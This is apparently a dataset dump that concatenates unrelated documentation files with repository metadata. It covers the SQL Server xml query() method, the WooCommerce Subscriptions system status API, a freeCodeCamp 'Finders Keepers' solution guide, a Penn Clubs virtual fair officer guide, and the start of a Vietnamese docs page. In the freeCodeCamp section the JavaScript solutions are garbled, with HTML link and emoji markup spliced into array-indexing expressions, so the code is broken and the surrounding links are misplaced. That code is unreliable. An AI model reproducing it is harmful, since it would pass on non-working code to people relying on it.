] | 3 | 2019-06-06T07:50:33.000Z | 2022-03-28T21:24:31.000Z | docs/t-sql/xml/query-method-xml-data-type.md | AndersUP/sql-docs | 3457f10fee7c7e8969300a549023a8f39dbe57b0 | [
"CC-BY-4.0",
"MIT"
] | 10 | 2022-02-15T00:49:23.000Z | 2022-02-23T22:10:33.000Z | docs/t-sql/xml/query-method-xml-data-type.md | AndersUP/sql-docs | 3457f10fee7c7e8969300a549023a8f39dbe57b0 | [
"CC-BY-4.0",
"MIT"
] | 8 | 2022-02-15T00:43:41.000Z | 2022-02-23T20:06:52.000Z | ---
description: "query() Method (xml Data Type)"
title: query() Method (xml Data Type)
ms.custom: ""
ms.date: 04/16/2020
ms.prod: sql
ms.reviewer: ""
ms.technology: t-sql
ms.topic: reference
dev_langs:
- "TSQL"
helpviewer_keywords:
- "query method"
- "query() method"
ms.assetid: f48f6f7b-219f-463a-bf36-bc10f21afaeb
author: MightyPen
ms.author: genemi
---
# query() Method (xml Data Type)
[!INCLUDE [SQL Server](../../includes/applies-to-version/sqlserver.md)]
Specifies an XQuery against an instance of the **xml** data type. The result is of **xml** type. The method returns an instance of untyped XML.
## Syntax
```syntaxsql
query ('XQuery')
```
[!INCLUDE[sql-server-tsql-previous-offline-documentation](../../includes/sql-server-tsql-previous-offline-documentation.md)]
## Arguments
XQuery
Is a string, an XQuery expression, that queries for XML nodes, such as elements and attributes, in an XML instance.
## Examples
This section provides examples of using the query() method of the **xml** data type.
### A. Using the query() method against an xml type variable
The following example declares a variable **\@myDoc** of **xml** type and assigns an XML instance to it. The **query()** method is then used to specify an XQuery against the document.
The query retrieves the <`Features`> child element of the <`ProductDescription`> element:
```sql
DECLARE @myDoc XML
SET @myDoc = '<Root>
<ProductDescription ProductID="1" ProductName="Road Bike">
<Features>
<Warranty>1 year parts and labor</Warranty>
<Maintenance>3 year parts and labor extended maintenance is available</Maintenance>
</Features>
</ProductDescription>
</Root>'
SELECT @myDoc.query('/Root/ProductDescription/Features')
```
The following output shows the result:
```
<Features>
<Warranty>1 year parts and labor</Warranty>
<Maintenance>3 year parts and labor extended maintenance is available</Maintenance>
</Features>
```
### B. Using the query() method against an XML type column
In the following example, the **query()** method is used to specify an XQuery against the **CatalogDescription** column of **xml** type in the **AdventureWorks** database:
```sql
SELECT CatalogDescription.query('
declare namespace PD="https://schemas.microsoft.com/sqlserver/2004/07/adventure-works/ProductModelDescription";
<Product ProductModelID="{ /PD:ProductDescription[1]/@ProductModelID }" />
') as Result
FROM Production.ProductModel
where CatalogDescription.exist('
declare namespace PD="https://schemas.microsoft.com/sqlserver/2004/07/adventure-works/ProductModelDescription";
declare namespace wm="https://schemas.microsoft.com/sqlserver/2004/07/adventure-works/ProductModelWarrAndMain";
/PD:ProductDescription/PD:Features/wm:Warranty ') = 1
```
Note the following items from the previous query:
- The CatalogDescription column is a typed **xml** column, which means it has a schema collection associated with it. In the [XQuery Prolog](../../xquery/modules-and-prologs-xquery-prolog.md), the **namespace** keyword defines the prefix that's later used in the query body.
- The **query()** method constructs XML, a <`Product`> element that has a **ProductModelID** attribute, in which the **ProductModelID** attribute value is retrieved from the database. For more information about XML construction, see [XML Construction (XQuery)](../../xquery/xml-construction-xquery.md).
- The [exist() method (XML data type)](../../t-sql/xml/exist-method-xml-data-type.md) in the WHERE clause finds only rows that contain the <`Warranty`> element in the XML. Again, the **namespace** keyword defines two namespace prefixes.
The following output shows the partial result:
```
<Product ProductModelID="19"/>
<Product ProductModelID="23"/>
...
```
Note the query() and exist() methods both declare the PD prefix. In these cases, you can use WITH XMLNAMESPACES to first define the prefixes and use it in the query.
```sql
WITH XMLNAMESPACES
(
'https://schemas.microsoft.com/sqlserver/2004/07/adventure-works/ProductModelDescription' AS PD,
'https://schemas.microsoft.com/sqlserver/2004/07/adventure-works/ProductModelWarrAndMain' AS WM
)
SELECT CatalogDescription.query('<Product ProductModelID="{ /PD:ProductDescription[1]/@ProductModelID }" />')
AS Result
FROM Production.ProductModel
WHERE CatalogDescription.exist('/PD:ProductDescription/PD:Features/WM:Warranty ') = 1;
```
## See Also
[Add Namespaces to Queries with WITH XMLNAMESPACES](../../relational-databases/xml/add-namespaces-to-queries-with-with-xmlnamespaces.md)
[Compare Typed XML to Untyped XML](../../relational-databases/xml/compare-typed-xml-to-untyped-xml.md)
[Create Instances of XML Data](../../relational-databases/xml/create-instances-of-xml-data.md)
[xml Data Type Methods](../../t-sql/xml/xml-data-type-methods.md)
[XML Data Modification Language (XML DML)](../../t-sql/xml/xml-data-modification-language-xml-dml.md)
| 43.907563 | 315 | 0.704115 | eng_Latn | 0.731937 |
973e1bff29b840051805dc10a7bd2a33fc0130b7 | 5,403 | md | Markdown | source/includes/_system-status.md | slykar/subscriptions-rest-api-docs | 13e7a7e35951b319b31c62c9510aa11987b50246 | [
"Apache-2.0"
] | 2 | 2021-11-10T13:29:55.000Z | 2022-02-21T23:58:50.000Z | source/includes/_system-status.md | slykar/subscriptions-rest-api-docs | 13e7a7e35951b319b31c62c9510aa11987b50246 | [
"Apache-2.0"
] | 8 | 2021-05-06T08:40:19.000Z | 2021-10-07T00:45:04.000Z | source/includes/_system-status.md | slykar/subscriptions-rest-api-docs | 13e7a7e35951b319b31c62c9510aa11987b50246 | [
"Apache-2.0"
] | 2 | 2021-09-28T12:50:35.000Z | 2022-01-23T10:09:45.000Z | # System Status #
Please refer to WooCommerce's guide on the [System Status endpoint](https://woocommerce.github.io/woocommerce-rest-api-docs/?shell#list-all-system-status-items). WooCommerce Subscriptions adds additional data to that endpoint's response. That additional data is documented below.
## Subscriptions properties ##
| Attribute | Type | Description |
|------------------------------------|---------|-----------------------------------------------------------------------|
| `wcs_debug` | boolean | Is WC Subscriptions debugging mode active? |
| `mode` | string | Whether the site is in `"live"` or `"staging"` mode. |
| `live_url` | string | The URL Subscriptions considers to be the site's live URL. |
| `statuses` | array | A breakdown of subscriptions and their statuses. |
| `report_cache_enabled` | boolean | Whether the report caches are enabled. |
| `cache_update_failures` | integer | The number of times report cache updates have failed. |
| `subscriptions_by_payment_gateway` | array | A breakdown of subscriptions by the gateway and their status. |
| `payment_gateway_feature_support` | array | A breakdown of the features supported by the active payment gateways. |
## List all system status items ##
### HTTP request ###
<div class="api-endpoint">
<div class="endpoint-data">
<i class="label label-get">GET</i>
<h6>wp-json/wc/v3/system_status</h6>
</div>
</div>
<aside class="notice">
The JSON example response only includes the sections added by WC Subscriptions. Please refer to <a href="https://woocommerce.github.io/woocommerce-rest-api-docs/#list-all-system-status-items">WooCommerce's documentation of the System Status endpoint</a> for the base response.
</aside>
```shell
curl https://example.com/wp-json/wc/v3/system_status \
-u consumer_key:consumer_secret
```
```javascript
WooCommerce.get("system_status")
.then((response) => {
console.log(response.data);
})
.catch((error) => {
console.log(error.response.data);
});
```
```php
<?php print_r($woocommerce->get('system_status')); ?>
```
```python
print(wcapi.get("system_status").json())
```
```ruby
woocommerce.get("system_status").parsed_response
```
> JSON response example:
```json
{
...
"subscriptions": {
"wcs_debug": true,
"mode": "live",
"live_url": "http://example.com",
"statuses": {
"trash": "3",
"auto-draft": "1",
"wc-active": "106",
"wc-pending-cancel": "3",
"wc-pending": "34",
"wc-on-hold": "120",
"wc-cancelled": "22"
},
"report_cache_enabled": true,
"cache_update_failures": 0,
"subscriptions_by_payment_gateway": {
"paypal": {
"wc-cancelled": "1"
},
"square_credit_card": {
"wc-active": "1",
"wc-on-hold": "60"
},
"stripe": {
"trash": "3",
"wc-active": "104",
"wc-cancelled": "21",
"wc-on-hold": "51",
"wc-pending": "23",
"wc-pending-cancel": "2"
}
},
"payment_gateway_feature_support": {
"paypal": [
"subscription_payment_method_change_customer",
"subscription_payment_method_change_admin",
"subscription_amount_changes",
"subscription_date_changes",
"multiple_subscriptions",
"subscription_payment_method_delayed_change",
"subscriptions",
"subscription_cancellation",
"subscription_suspension",
"subscription_reactivation",
"products",
"refunds",
"paypal_reference_transactions"
],
"ppec_paypal": [
"products",
"refunds",
"subscriptions",
"subscription_cancellation",
"subscription_reactivation",
"subscription_suspension",
"multiple_subscriptions",
"subscription_payment_method_change_customer",
"subscription_payment_method_change_admin",
"subscription_amount_changes",
"subscription_date_changes"
],
"stripe": [
"products",
"refunds",
"tokenization",
"add_payment_method",
"subscriptions",
"subscription_cancellation",
"subscription_suspension",
"subscription_reactivation",
"subscription_amount_changes",
"subscription_date_changes",
"subscription_payment_method_change",
"subscription_payment_method_change_customer",
"subscription_payment_method_change_admin",
"multiple_subscriptions",
"pre-orders"
]
}
}
```
| 35.781457 | 279 | 0.525079 | eng_Latn | 0.469646 |
973e2a57b8b3c7c5ae15c006e3401f370c03dc6d | 5,542 | md | Markdown | src/pages/certificates/finders-keepers/index.md | UpperLEFTY/guides | 44656e2cc64709e753cd17e7b54b0a32694f0392 | [
"BSD-3-Clause"
] | 2 | 2018-03-03T12:20:33.000Z | 2019-11-29T19:12:22.000Z | src/pages/certificates/finders-keepers/index.md | sdmg15/guides | 75eb285fc2f391c03a0fadf2c47e2dfcd2c80a8a | [
"BSD-3-Clause"
] | null | null | null | src/pages/certificates/finders-keepers/index.md | sdmg15/guides | 75eb285fc2f391c03a0fadf2c47e2dfcd2c80a8a | [
"BSD-3-Clause"
] | 1 | 2019-10-08T08:12:54.000Z | 2019-10-08T08:12:54.000Z | ---
title: Finders Keepers
---
###  Problem Explanation:
The problem is quite simple to understand. You will check for each element in the array that is passed in the first argument, if the element plugged in to the function passed as the second argument returns true the first time. We do not care about the second or third one that is true, only the very first one if any. If there are none, then return undefined. This last bit is not explained but it is part of the tests used.
#### Relevant Links
<a href='https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/substr' target='_blank' rel='nofollow'>str.substr()</a>
##  Hint: 1
You can use the function directly from the parameter, no need to rename it or anything.
> _try to solve the problem now_
##  Hint: 2
You need to pass an element and record it if the function returns true, for this you just have to pass the element as the parameter for the function.
> _try to solve the problem now_
##  Hint: 3
If no element satisfy the function then you must return **undefined**
> _try to solve the problem now_
## Spoiler Alert!

**Solution ahead!**
##  Basic Code Solution:
function findElement(arr, func) {
// Make num undefined by default
var num;
// Loop thorugh the array and use the function to check
for (var a = 0; a < arr.length; a++) {
if (func(arr<a href='https://forum.freecodecamp.com/images/emoji/emoji_one/rocket.png?v=3 ":rocket:"' target='_blank' rel='nofollow'>a])) {
// Store the first case and break the loop
num = arr[a];
return num;
}
}
// otherwise return undefined
return num;
}
findElement([1, 2, 3, 4], function(num) {
return num % 2 === 0;
});
// test here
findElement([1, 2, 3, 4], function(num){ return num % 2 === 0; });
![:rocket:</a> <a href='https://repl.it/CLn6/0' target='_blank' rel='nofollow'>Run Code</a>
### Code Explanation:
* To make the code easier, create an undefined variable that will be returned.
* Loop through the array to check for each element if it satisfy the function. This is done by passing the arr<a href='http://forum.freecodecamp.com/t/javascript-for-loop/14666s-Explained' target='_blank' rel='nofollow'>index of the loop] as the parameter for the function from the second argument.
* If true, then store the array element, and return it. This will stop the loop. No else needed.
* If the loop was not broken and it has ended, then return **num** which by default is undefined. This means that none of the elements from the array satisfied the function.
#### Relevant Links
* [JS For Loops Explained</a>
##  Intermediate Code Solution:
function findElement(arr, func) {
filterArr = arr.filter(func); //filter array with the function provided
return filterArr<a href='https://forum.freecodecamp.com/images/emoji/emoji_one/rocket.png?v=3 ":rocket:"' target='_blank' rel='nofollow'>0]; //return the first element that returns true, or undefined if no elements return true
}
// test here
findElement([1, 2, 3, 4], function(num){ return num % 2 === 0; });
 NOTES FOR CONTRIBUTIONS:
*  **DO NOT** add solutions that are similar to any existing solutions. If you think it is **_similar but better_**, then try to merge (or replace) the existing similar solution.
* Add an explanation of your solution.
* Categorize the solution in one of the following categories — **Basic**, **Intermediate** and **Advanced**. 
* Please add your username only if you have added any **relevant main contents**. ( **_DO NOT_** _remove any existing usernames_)
> See  <a href='http://forum.freecodecamp.com/t/algorithm-article-template/14272' target='_blank' rel='nofollow'>**`Wiki Challenge Solution Template`**</a> for reference. | 55.979798 | 424 | 0.724107 | eng_Latn | 0.822773 |
974007ea2e48cd3e9a557ce6715dcf5bb05a6883 | 6,600 | md | Markdown | _posts/2017-11-07-resources.md | jamesoneill12/jamesoneill12.github.io | e585abbcac3a81ebd08c7712573a2234bcfd5b8f | [
"MIT"
] | 1 | 2020-06-06T19:14:10.000Z | 2020-06-06T19:14:10.000Z | _posts/2017-11-07-resources.md | jamesoneill12/jamesoneill12.github.io | e585abbcac3a81ebd08c7712573a2234bcfd5b8f | [
"MIT"
] | null | null | null | _posts/2017-11-07-resources.md | jamesoneill12/jamesoneill12.github.io | e585abbcac3a81ebd08c7712573a2234bcfd5b8f | [
"MIT"
] | 1 | 2021-12-24T22:21:27.000Z | 2021-12-24T22:21:27.000Z | ---
title: 'Resources for learning about ML'
date: 2017-11-07
modified: 2021-07-22
permalink: /resources/
toc: true
toc_sticky: true
excerpt: "Review of resources to learn about ML."
header:
teaser: "resources/resources-teaser.jpg"
tags:
- Learning
- ML
- Resources
redirect_from:
- /posts/2017/11/resources/
---
{% include base_path %}
There are so many useful machine learning resources out there and even more posts reviewing these resources :sweat_smile:. The goal of this page is not to list everything but only those that I have used/(partially) completed/read and that I can review. Maybe it will be hopeful for someone but I also want to keep track of what I have seen and liked.
:mag: <span class='note'> Side Notes </span> :
* I have a strong preference towards videos, interactive visualization, and intuitive mathematical explanation.
* Click on the resources to get some additional information!
* I will mostly have review saying that these are excellent resources, but this is because I didn't finish reading/watching the ones I liked less.
## General Machine Learning
{% include_relative _resources/res_generalML.md %}
<p></p>
<div>
<details>
<summary>"Reading" List</summary>
<div markdown='1'>
* :books: [The Elements of Statistical Learning - T. Hastie, R. Tibshirani, J. Friedman](https://web.stanford.edu/~jurafsky/slp3/ed3book.pdf)
</div>
</details>
</div>
## Reinforcement Learning
{% include_relative _resources/res_RL.md %}
<p></p>
<div>
<details>
<summary>"Reading" List</summary>
<div markdown='1'>
* :books: [Reinforcement Learning: An Introduction - R. Sutton, A. Barto](http://incompleteideas.net/sutton/book/bookdraft2017june19.pdf)
* :mortar_board: [UC Berkeley - Deep Reinforcement Learning](https://www.youtube.com/watch?v=Q4kF8sfggoI&list=PLkFD6_40KJIznC9CDbVTjAF2oyt8_VAe3)
</div>
</details>
</div>
## Bayesian Methods
*Note: the PRML, the MLPP and UBC's Graduate Machine Learning class, which I reviewed in the first section, are a good introduction to Bayesian methods and a Bayesian perspective of ML.*
{% include_relative _resources/res_bayesian.md %}
<p></p>
<div>
<details>
<summary>"Reading" List</summary>
<div markdown='1'>
* :books: [Bayesian Data Analysis - A. Gelman, J. Carlin, H. Stern, D. Dunson, A. Vehtari, D. Rubin](http://www.stat.columbia.edu/~gelman/book/)
* :movie_camera: [Max Planck Institute - Statistical Rethinking](https://www.youtube.com/watch?v=WFv2vS8ESkk&list=PLDcUM9US4XdMdZOhJWJJD4mDBMnbTWw_z&index=1)
</div>
</details>
</div>
## Deep Learning
{% include_relative _resources/res_DL.md %}
<p></p>
<div>
<details>
<summary>"Reading" List</summary>
<div markdown='1'>
* :mortar_board: [Stanford - CS231n: Convolutional Neural Networks for Visual Recognition](https://www.youtube.com/playlist?list=PLC1qU-LWwrF64f4QKQT-Vg5Wr4qEE1Zxk)
* :mortar_board: [MIT - 6.S094: Deep Learning for Self-Driving Cars](https://www.youtube.com/playlist?list=PLrAXtmErZgOeiKm4sgNOknGvNjby9efdf)
* :mortar_board: [Deep Learning Summer School 2015](http://videolectures.net/deeplearning2015_montreal/)
* :mortar_board: [Deep Learning Summer School 2016](http://videolectures.net/deeplearning2016_montreal/)
* :movie_camera: [Udemy - Zero to Deep Learning with Python and Keras](https://www.udemy.com/zero-to-deep-learning/)
* :movie_camera: [Fast.ai - Deep Learning for Coders](http://www.fast.ai/)
</div>
</details>
</div>
## Graphical Models
{% include_relative _resources/res_graphicalModels.md %}
<p></p>
<div>
<details>
<summary>"Reading" List</summary>
<div markdown='1'>
* :books: [Probabilistic Graphical Models - D. Koller, N. Friedman](http://pgm.stanford.edu/)
* :movie_camera: [Coursera - Probabilistic Graphical Models](https://www.coursera.org/specializations/probabilistic-graphical-models)
</div>
</details>
</div>
## Natural Language Processing
{% include_relative _resources/res_NLP.md %}
<p></p>
<div>
<details>
<summary>"Reading" List</summary>
<div markdown='1'>
* :books: [Speech and Language Processing - D. Jurafsky, J. Martins](https://web.stanford.edu/~jurafsky/slp3/ed3book.pdf)
* :mortar_board: [Oxford - Deep NLP](https://github.com/oxford-cs-deepnlp-2017/lectures)
* :mortar_board: [CMU - Neural Nets for NLP](https://www.youtube.com/watch?v=vnzKAhs7nds)
* :movie_camera: [Stanford - NLP](https://www.youtube.com/watch?v=nfoudtpBV68&index=1&list=PLhVhwi0Pz282aSA2uZX4jR3SkF3BKyMOK)
* :movie_camera: [Udemy - NLP with Deep Learning in Python](https://www.udemy.com/natural-language-processing-with-deep-learning-in-python)
</div>
</details>
</div>
## Time Series
{% include_relative _resources/res_timeSeries.md %}
<p></p>
## Automatic Speech Recognition
{% include_relative _resources/res_speech.md %}
<p></p>
<div>
<details>
<summary>"Reading" List</summary>
<div markdown='1'>
* :books: [Speech and Language Processing - D. Jurafsky, J. Martins](https://web.stanford.edu/~jurafsky/slp3/ed3book.pdf)
* :books: [Fundamentals of Speech Recognition - L. Rabiner, B.-H. Juang](https://www.amazon.co.uk/Fundamentals-Speech-Recognition-Prentice-Processing/dp/0130151572)
</div>
</details>
</div>
## Optimization and Numerical Analysis
{% include_relative _resources/res_optimization.md %}
<p></p>
<div>
<details>
<summary>"Reading" List</summary>
<div markdown='1'>
* :books: [Convex Optimization - S. Boyd, L. Vandenberghe](https://web.stanford.edu/~boyd/cvxbook/)
* :mortar_board: [Stanford - Convex Optimization](https://www.youtube.com/watch?v=McLq1hEq3UY)
* :movie_camera: [Coursera - Discrete Optimization](https://www.coursera.org/learn/discrete-optimization)
</div>
</details>
</div>
## Computational Neuroscience
{% include_relative _resources/res_neuroscience.md %}
<p></p>
<div>
<details>
<summary>"Reading" List</summary>
<div markdown='1'>
* :books: [Theoretical Neuroscience: Computational and Mathematical Modeling of Neural Systems - P. Dayan, L. Abbott](http://barabasi.com/networksciencebook/)
* :movie_camera: [Coursera - Computational Neuroscience](https://www.coursera.org/learn/computational-neuroscience)
</div>
</details>
</div>
## Other
<div>
<details>
<summary>"Reading" List</summary>
<div markdown='1'>
* :books: [Network Science - A. Barabási](http://barabasi.com/networksciencebook/)
* :movie_camera: [Coursera - Game Theory](https://www.coursera.org/learn/game-theory-1)
* :movie_camera: [Coursera - Recommender Systems Specialization](https://www.coursera.org/specializations/recommender-systems)
* :mortar_board: [Stanford - Mining Massive Datasets](https://www.youtube.com/playlist?list=PLLssT5z_DsK9JDLcT8T62VtzwyW9LNepV)
</div>
</details>
</div>
<p></p>
| 36.263736 | 351 | 0.745758 | yue_Hant | 0.294284 |
9740916ae8b5f69e3a978c37a33c0f88b37b01eb | 324 | md | Markdown | _project/34-great-kitchen-decorating-ideas-with-farmhouse-style-for-your-ordinary-home.md | rumnamanya/rumnamanya.github.io | 2deadeff04c8a48cf683b885b7fa6ab9acc1d9d9 | [
"MIT"
] | null | null | null | _project/34-great-kitchen-decorating-ideas-with-farmhouse-style-for-your-ordinary-home.md | rumnamanya/rumnamanya.github.io | 2deadeff04c8a48cf683b885b7fa6ab9acc1d9d9 | [
"MIT"
] | null | null | null | _project/34-great-kitchen-decorating-ideas-with-farmhouse-style-for-your-ordinary-home.md | rumnamanya/rumnamanya.github.io | 2deadeff04c8a48cf683b885b7fa6ab9acc1d9d9 | [
"MIT"
] | null | null | null | ---
layout: project_single
title: "34 Great Kitchen Decorating Ideas With Farmhouse Style For Your Ordinary Home"
slug: "34-great-kitchen-decorating-ideas-with-farmhouse-style-for-your-ordinary-home"
parent: "home-farmhouse-decorating-ideas"
---
34 Great Kitchen Decorating Ideas With Farmhouse Style For Your Ordinary Home | 46.285714 | 87 | 0.805556 | eng_Latn | 0.68529 |
974096b9d5e50f8e13b2bdd4371168ae4d4d2da1 | 3,087 | md | Markdown | docs/_libdoc/klangstrom.md | dennisppaul/klangstrom-arduino | d1f805b9813d1ec08b5b850abf1270fb037245d9 | [
"CC0-1.0"
] | 5 | 2021-05-04T07:32:05.000Z | 2022-01-18T11:04:14.000Z | docs/_libdoc/klangstrom.md | dennisppaul/klangstrom-arduino | d1f805b9813d1ec08b5b850abf1270fb037245d9 | [
"CC0-1.0"
] | 5 | 2021-05-16T11:00:13.000Z | 2021-12-20T23:16:24.000Z | docs/_libdoc/klangstrom.md | dennisppaul/klangstrom-arduino | d1f805b9813d1ec08b5b850abf1270fb037245d9 | [
"CC0-1.0"
] | null | null | null | ---
layout: libdoc
title: Klangstrom ( Application )
permalink: /klangstrom/
index: 10
---
*Klangstrom* supplies an application structure to facilitate the development of applications.
*Klangstrom* extends the arduino *idiom* ( i.e `setup`) + `loop()` ) with sound, music + event related functions ( e.g `audioblock()` + `beat()` ). *Klangstrom* also implements a simple abstraction layer to unify access to peripherals ( e.g `data_receive()` + `data_transmit()` ).
the following functions can ( but do not have to be ) implemented in the application:
<ul>
{% assign items = site.klangstrom | sort: 'index' %}
{% for page in items %}
{% if page.tag == "implement" %}
<li><code><a href="{{ page.url | relative_url }}">{{ page.title }}()</a></code> {{ page.excerpt | strip_html }}</li>
{% endif %}
{% endfor %}
</ul>
the following functions allow to configure and query application and hardware states or communicate with peripherals ( e.g LEDs, buttons, GPIOs, UART(serial), SPI, I2C, SD Card ):
<ul>
{% assign items = site.klangstrom | sort: 'index' %}
{% for page in items %}
{% if page.tag == "library" %}
<li>
<code><a href="{{ page.url | relative_url }}">{{ page.title }}()</a></code> {{ page.excerpt | strip_html }}
</li>
{% endif %}
{% endfor %}
</ul>
## Blink: An Example Application
in this examples a tone is played and changed periodically while an LED is turned on and off. in the `setup()` function two nodes are connected and the `beat` function is configured to be called once a second. the `loop()` function is implemented but does not contain any *real* functionality. in the `beat()` function LED and tone are changed every odd beat to one state and every even beat to another. in `audioblock()` the left and right output buffers are populated by the DAC node.
```c
#include "Nodes.hpp"
using namespace klang;
using namespace klangstrom;
NodeVCOFunction mVCO;
NodeDAC mDAC;
void setup() {
Klang::lock();
Klang::connect(mVCO, Node::CH_OUT_SIGNAL, mDAC, NodeDAC::CH_IN_SIGNAL_LEFT);
mVCO.set_amplitude(0.25);
mVCO.set_frequency(110);
mVCO.set_waveform(NodeVCOFunction::WAVEFORM::SINE);
Klang::unlock();
beats_per_minute(60);
}
void loop() {
delay(10); // wait for 0.01 sec
}
void beat(uint32_t pBeat) {
if ( (pBeat%2)==0 ) {
led(LED_00, true); // turn LED_00 on ( `true` is ON )
mVCO.set_amplitude(0.25); // set amplitude to 25%
mVCO.set_frequency(110); // set frequencey to 110Hz
} else {
led(LED_00, false); // turn LED_00 off ( `false` is OFF )
mVCO.set_amplitude(0.0); // set amplitude to 0%
mVCO.set_frequency(200); // set frequencey to 220Hz
}
}
void audioblock(SIGNAL_TYPE* pOutputLeft, SIGNAL_TYPE* pOutputRight,
SIGNAL_TYPE* pInputLeft, SIGNAL_TYPE* pInputRight) {
/* process next audio block */
mDAC.process_frame(pOutputLeft, pOutputRight);
}
```
see [Klang]({{ site.baseurl }}{% link _libdoc/klang.md %}) documentation for further details on nodes.
| 37.192771 | 486 | 0.66116 | eng_Latn | 0.923819 |
97411e6e5a47ca18cc82407edb8e549554d1fcfe | 8,522 | md | Markdown | frontend/markdown/fair.md | pennlabs/penn-clubs | 6165e56ee5745295adc14fe114c4973173c2cb43 | [
"MIT"
] | 23 | 2020-01-15T20:11:06.000Z | 2022-01-01T12:47:50.000Z | frontend/markdown/fair.md | pennlabs/penn-clubs | 6165e56ee5745295adc14fe114c4973173c2cb43 | [
"MIT"
] | 397 | 2020-01-17T03:42:30.000Z | 2022-03-07T23:37:16.000Z | frontend/markdown/fair.md | pennlabs/penn-clubs | 6165e56ee5745295adc14fe114c4973173c2cb43 | [
"MIT"
] | 7 | 2020-01-29T05:11:38.000Z | 2022-01-03T19:41:59.000Z | # Penn Clubs: Virtual Activites Fair Officer Guide
<div class="notification is-info"><b>Are you a fair participant?</b> This guide is meant for club officers to prepare for the virtual fair. If you are looking for instructions on how to participate in the fair, click <a href="/fair">here</a>.</div>
Hi there! 🎉
Welcome to **Penn Clubs**, the University of Pennsylvania's official registry for student organizations on campus. The purpose of this guide is to walk you through the many different features that Penn Clubs can offer that will make your experience recruiting new members as easy as possible.
<div class="has-text-danger">Club officers will <b>not</b> be able to access the list of students that have bookmarked their club. Bookmarks are intended for personal use only. If you would like a student to send you their contact information, ensure that they <b>subscribe</b> to your club instead of bookmarking it.</div>
## 📅 REQUIRED: Editing Your Activites Fair Booth
To help you get set up, use our automated system by clicking the button below. This is a quick, three-step process that will make sure your meetings are configured correctly for the upcoming fair.
<a href="/zoom" class="button is-success">Start Setup</a>
The final step of the setup process will ask you to add a description and cover photo to your event. You can do this by clicking on the "Edit Event" button.

You will need to change the following fields:
- Add a description
- Add a cover photo (16:9 dimensions, preferably 1920 x 1080)
We recommend that you fill out as many details as possible. Students will be shown currently occuring events in completely random order, with one exception. Clubs that have fully entered their event information will appear above clubs who have not.
Note that this date is **fixed**. Trying to change the date and time will result in an error, preventing you from saving your details. If you have any questions about the date, please email the event organizers.
**Be sure to hit the green "save" button on the lefthand side when you are done!**

**And that's it!** Your club's event will show up in the portal during the live, virtual activites fair on the day you are assigned.
## 🎤 Hosting Your Zoom Event
- If you use a personal account, the maximum number of people that can attend your meeting at once is **100 people**. If you use the school provided account, this limit increases to **300 people**. You can check the meeting limit for you account on the Zoom settings page.
- Make all present members of the session **co-hosts** to help control the session.
- Have the chat window **open** to answer any questions. For busier sessions, we recommend designating one member to be monitoring the chat window.

## 🎥 Recording Part of Your Session
If you are planning to use a short pitch or short presentation to share with prospective students, we encourage you to record a small partof your Zoom session so that students, especially those with time zone conflicts, can access the recording again. You will be able to link the video recording on your club page after the fair. If you choose to do this, please keep in mind:
- You should aim to record one presentation/description of your club that is no longer than a few minutes.
- Before recording, you must announce aloud at the start of the session that the presentation portion will be recorded for content purposes and allow students to decide if they wish to stay off-camera until the recording is complete. Once the record button is selected, all participants will receive a consent pop up message prompting them to stay in or leave the meeting during the recording.
- No other virtual session portions should be recorded, including chats, Q & A, or other activities (i.e. icebreakers, etc.) that may occur during sessions.
To do this, a host of the session can simply just hit the record button. To easily link the file on your club page later, we recommend you click on the "Record to the Cloud" option.

## 👨👩👧👦 Managing Breakout Rooms
For busier sessions where multiple club members are present, we recommend taking advantage of the **breakout room** feature, which can be prompted by hosts. Breakout rooms can be used to facilitate 1 on 1 conversations with club members and fair attendees. We would suggest **manually assigning** people to a breakout room, to ensure a member of the club is in each breakout room to answer questions.

Once you choose the number of rooms, you can manually assign participants to each room. Just click the "Assign" button and select the active participants you would like to move into each breakout room.

Hosts and co-hosts can move around to breakout rooms freely, though regular participants must join the room they are assigned. As a host, you must regularly be watching the Breakout Rooms window, as new participants will not be put in a breakout room initially. You will have to assign them manually, by clicking the "Assign to" button next to their name when they join. They will be listed under the "Unassigned" attendees.

You can also broadcast messages to all of the participants in the breakout by using the "Broadcast message to all" button.

For more information, check out the on the Zoom website about breakout rooms [here](https://support.zoom.us/hc/en-us/articles/206476313-Managing-Breakout-Rooms).
## 📎 Recruitment Resources
Tired of creating a Google Form to track all interested members? Now, students can click the "Subscribe" bell button on your club's page to immediately be added to your club's own interest list without spending the time to fill out a form. By hitting the "Subscribe" bell button, interested members will have their name and email added to your interest list. You will receive the following information about each subscriber:
- Name
- Email
- Graduation Year
- School(s)
- Major(s)

To access this interest list, simply navigate to "Manage Club" once again, then to the "Recruitment" tab. You will see a table of members who have subscribed to your club. You can scroll to the bottom to download an Excel file of all these members' names, emails, and more self-reported information.

## ❓Club Q&A
To allow interested students to ask questions about your club at any time, we also have an FAQ section on each club's page. When students post a question, all club officers will receive an email notification that a question has been asked.

To answer the questions, navigate once again to the "Manage Club", and then to the "Questions" tab, where you can see all questions asked and answer or delete them. You can also choose to hide or show a question on your club's profile once it has been answered.

## 👩👧👦 Managing Members
As you can tell, there is a lot of responsibility for club owners already. To help lessen the load, you can invite other officers of your club to join your club's profile. Click the "Manage Club" button once again, and then navigate to the "Membership" tab. By entering email addresses (separated by commas or newlines) you can send invites to all the officers of your club by clicking the "Officer" status under Permissions. You can do the same with non-officer members, but leaving their status as "Member". **Only Officers and Owners of a club have access to the Manage Club button**.

## ⚙️ Settings
We encourage clubs to keep their club pages as up-to-date as possible with descriptions, members, social media links, events, and more! Check out our [ranking algorithm](/rank) here to discover ways to boost your club and events to the top of Penn Clubs, simply by providing more information on your club for prospective members.
If you have any questions, please don't hesitate to reach out to [email protected].
## 📝 Feedback
We're always looking for ways to improve our products. If you have any feedback, whether it be bugs,
improvements, new features, or anything else, please let us know by
filling out our [feedback form](https://airtable.com/shrCsYFWxCwfwE7cf)! | 74.754386 | 588 | 0.777752 | eng_Latn | 0.99949 |
97417e27b66baaa3b13e8c336cf14fdb714c9ad0 | 2,304 | md | Markdown | content/vi/docs/home/_index.md | kranx41/website | e8b95d594c3514de2ade20e9f27e37ea84d240c9 | [
"CC-BY-4.0"
] | 1 | 2020-02-05T02:33:27.000Z | 2020-02-05T02:33:27.000Z | content/vi/docs/home/_index.md | kranx41/website | e8b95d594c3514de2ade20e9f27e37ea84d240c9 | [
"CC-BY-4.0"
] | 13 | 2020-12-14T07:28:11.000Z | 2021-08-03T07:23:52.000Z | content/vi/docs/home/_index.md | kranx41/website | e8b95d594c3514de2ade20e9f27e37ea84d240c9 | [
"CC-BY-4.0"
] | 53 | 2020-01-24T02:34:55.000Z | 2021-05-16T09:48:52.000Z | ---
